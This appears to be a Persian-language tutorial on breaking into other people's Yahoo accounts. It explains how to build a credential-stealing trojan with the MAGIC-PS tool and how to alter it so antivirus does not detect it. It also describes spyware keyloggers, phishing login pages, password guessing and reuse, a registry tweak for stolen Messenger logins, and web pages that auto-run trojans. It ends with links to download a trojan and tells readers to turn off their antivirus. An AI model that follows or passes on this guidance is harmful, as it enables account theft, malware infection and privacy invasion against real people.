آموزش:
1 ) استفاده از تروجان
کار اصلی تروجان ها فرستادن اطلاعات از کامپیوتر قربانی به سازنده خود است هکر ها نرم افزار هایی را طراحی کرده اند که با تنظیماتی که بروی آن ها انجام میدهیم یک فایل بسیار کم حجم را برای ما میسازد که وقتی این فایل بروی سیستم قربانی اجرا شد آن سیستم به تروجان آلود ه شود و هردفه به اینترنت وصل شد اطلاعات مشخص شده فرستاده شود . این اطلاعات به تنظیمات و قدرت برنامه ساخت تروجان بستگی دارد .
برای مثال به معرفی یک سازنده تروجان می پردازیم: MAGIC-PS
victim: اطلاعات مورد نیاز که می خواهیم برایمان فرستاده شود (آی دی و پسورد یاهو مسنجر ،آدرس اینترنتی کامپیوتر ، نام کامپیوتر و ...)
Fake Error messege: طراحی یک پیام نمایشی بعد از اجرای تروجان
your yahoo id: در این قسمت باید آی دی خود را وارد کنید تا اطلاعات به آن فرستاده شود
binnder: این قسمت به شما اجازه میدهد تا فایلی را انتخاب کنید تا بعد از اجرای آن تروجان آن فایل اجرا شود
choose icon: برای انتخاب یک شکلک برای فایل تروجان تان
mps: دراین قسمت نامی را برای تروجان انتخاب میکنید
و در آخر بروی این کلیک می کنید. create mps
نکته 1 : هیچ موقع بروی کامپیوتر خود اجرا نکنید .
نکته 2 : بدلیل قدیمی بودن این تروجان برای تعدادی از ویروس کش ها قابل شناسایی می باشد شما میتوانید با تغیرات در ساختار فایل از شناسایی آن جلوگیری کنید یا از تروجان های جدید استفاده کنید .
نکته 3 : این تروجان برای همه ورژن های یاهو مسنجر جواب میدهد.
2) استفاده از نرم افزار های جاسوسی
یکی دیگر از روشهای بدست آوردن پسوردها و مانیتور کردن سیستم قربانی استفاده از نرم افزار های جاسوسی می باشد این نرم افزار ها بعد از نصب بروی کامپیوتر قربانی فعال شده و تمامی فعالیت هایی را که در آن کامپیوتر انجام میشود (کلید های زده شده ، پسورد های وارد شده ، تصاویر دیده شده ، آدرس فایل های اجرا شده ، آدرس سایت های دیده شده ، زمان روشن و خاموش شدن کامپیوتر و...) را برای ایمیل مشخص شده می فرستد این نرم افزارها دارای قدرت بسیار زیادی هستند و عملیات خود را بروی وقفه ها و ثبات ها و رجیستر ویندوز انجام میدهند .(نام بعضی از این نرم افزارها عبارت است از :
PC Agent 4.0 ، Star ، keyloger 2و ... )
خوشبختانه بهترین و قدرتمند ترین نرم افزارهای جاسوسی بسیار گران هستند و یا دارای قفل های قوی هستند که کرک کردن آن ها کار بسیار دشواری است . انشا ا... در مقاله دیگر به کرک کردن نرم افزارها می پردازیم .
3 ) استفاده از صفحات لوگین
همانطور که مطلع هستید یک هکر بجزء قدرت برن امه نویسی به زبان های مختلف بخصوص شبکه و آشنایی کامل با سیستم عامل و سخت افزار باید دارای روانشناسی بالایی باشد تا بتواند با زمینه سازی یک حقه طرف مقابل خود را به سادگی فریب دهد . بعضی از هکر ها صفحه ای همانند صفحه ورود به ایمیل یاهو طراحی کرده ودر سایت خو د آپلود میکنند وآدرس آن صفحه را با کلک های متفاوتی برای قربانی میفرستند و قربانی غافل از جریان ایمیل و رمز خود را توسط این صفحه برای هکر میفرستد . یکی از روشهایی که طرف مقابل فریب میخورد این است که یک ایمیل به او بزنیم و در آن ایمیل از یک اسکریپت لینک دهند ه به آدرس آن صفحه استفاده کنید .طرف مقابل با چک کردن ایمیل به صورت اتوماتیک از ایمیلش خارج شده و به آن صفحه میرود و او برای ورود مجدد دوباره رمز خود را میزند واصلا متوجه نمی شود هک شده است
4 ) استفاده از اطلاعات شخصی افراد
بسیاری از افراد رمز های خو د را بر حسب اطلاعات شخصی خود قرار میدهند بعضی ها شماره موبایل خود را می گذارند بعضی ها هم نام ، نام خوانوادگی و … بعضی از افراد هم برای رمز خود قانون می سازند ویا از 123456 استفاده میکنند خلاصه مطلب اینکه میتوان رمز آنها را به راحتی حدس زد تنها باید بتو انیم ذهن و فکر طرف مقابلمان را بخوانیم . ضمناً نرم افزار هایی وجود دارند که بانک رمز خود را به صورت تصادفی برای ایمیل مشخص شده امتحان میکنند اما این نرم افزار ها دیگر برای یاهو کاربرد ندارند چون سیستم یاهو به گونه ای است که وقتی برای چند بار رمز را اشتباه وارد کنیم از ما یک کد امنیتی میخواهد تا ربات ها نتوانند رمز ها را پیدا کنند.
5) بدست آوردن اشتراک های دیگر
اکثر افراد تمامی رمز های خود را یکی انتخاب می کنند تا از خطر فراموش کردن آن جلوگیری شود پس ما میتوانیم بدلیل امنیت بالای یاهو از هک کردن ایمیل یا هو به صورت مستقیم دست برداریم و با بدست آوردن شناسه او در سایت های دیگر آن شناسه را هک کنیم که در واقع با پیدا کردن آن پسورد ، رمزاصلی آن لو رفته است هک کردن شناسه سایت ها
open source کار بسیار دشواری نیست ولی خارج از بحث ما می باشد
6 ) استفاده از فرمان های رجیستر و ساختار سیستم عامل
ما میتوانیم با بهره گیری از فرمان های رجیستری ویندوز آی دی ها و رمز های وارد شده در این سیستم رابدست آوریم مثلا اگر خصوصیت
HKEY_CURRENT_USER\Software\yahoo\pager\Save Password را 1 قرار دهیم آی دی و رمز آخرین نفری را که و ارد یاهو مسنجر شده را بروی یاهو مسنجر به حالت ثبت شده در می آورد و ما با زدن دکمه Sing in ما وارد ای دی طرف میشویم . ضمناً همانطور که میدانید تمامی
فعالیت هایی که ما با کامپیوتر انجام میدهیم ثبت میشود تنها ما با Decode کردن آن اطلاعات ثبت شده می توانیم به رمز های کاربران دست یابیم فایل هایی که اطلاعات در آن ها ثبت می شود عبارتند از System.dat ، User.dat
7 ) استفاده از امکانات یاهو برای فراموشی رمز
ما میتوانیم خودمان را جای طرف مقابلمان قرار دهیم و فکر کنیم رمزمان را فراموش کرده ایم البته باید با اطلاعات شخصی آن طرف آشنا باشیم و قربانی را کاملا بشناسیم
8 ) استفاده از قابلیت های جدید کنترل پنل های جدید وب
برای راحتی و مخفی ماندن روش هک بعضی از هکر ها فایل های تروجان خود را بروی سرورهای وب قرار داده که قابلیت ها و امکانات جدیدی دارند . بعضی از سرور ه ا توانایی اجرای فایل های exe را دارند و تنها نیاز است آدرس آن فایل را طوری در صفحه وب قرار دهیم که خود به خود فرا خوانی شود و سیستم قربانی را آلوده کند .برای فراخوانی می توان یم از زبانهای php ، cgi و زبان های دینامیک دیگر استفاده کرد .این روش در اکثر مواقع جواب میدهد ولی برای افرادی که بروی کامپیوترشان یکی از برنامههای مدیریت دانلود نصب است اجازه دانلود میگیرد که باعث لو رفتن کار میشود
9 ) دست یافتن به دیتابیس یاهو
عده ای گاهی به این فکر می افتند که به سرور یاهو وارد شوند . سرور یاهو دارای امنیت بسیار بالا یی است و تمامی راه های نفوذی آن بسته است البته هنوز هم می توان آن را هک کرد ولی تنها برای چند ثانیه چون سیستم مانیتورینگ یاهو به سرعت به آن شرکت اخطار میدهد و به سرعت شما شناسایی می شوید و خدمات یاهو از شما گرفته میشود پس شما برای این کار باید از سرعت ارتباطی بالایی با اینترنت برخودار باشید تمامی مسیر های یاهو را بدانید هدف را مشخص کنید به زبانهای برنامه نویسی تحت وب تسلط داشته باشید با ساختار یاهو آشنا باشید از باگ های یاهو مطلع باشید با از دست دادن خدمات یاهو ناراحت نشوید
(( این مقاله بصورت فی البداع وذهنی تایپ شده است احتمالا دارای اشکالات زیادی باشد .
امیدوارم به بزرگواری خودتان ببخشید ))
لینک تروجان : از این دو لینک تروجان دانلود کنید فقط توجه داشته باشید که آنتی ویروس باید غیر فعال باشد
http://facebook90.persiangig.com/image/axam.htm
http://www.opendownload.ir/files/Yahoo_Cracker_MPS-15-Final.rar
با تشکر
